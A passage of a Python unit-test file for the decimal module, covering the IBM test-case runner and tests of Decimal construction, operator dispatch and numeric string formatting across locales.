if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
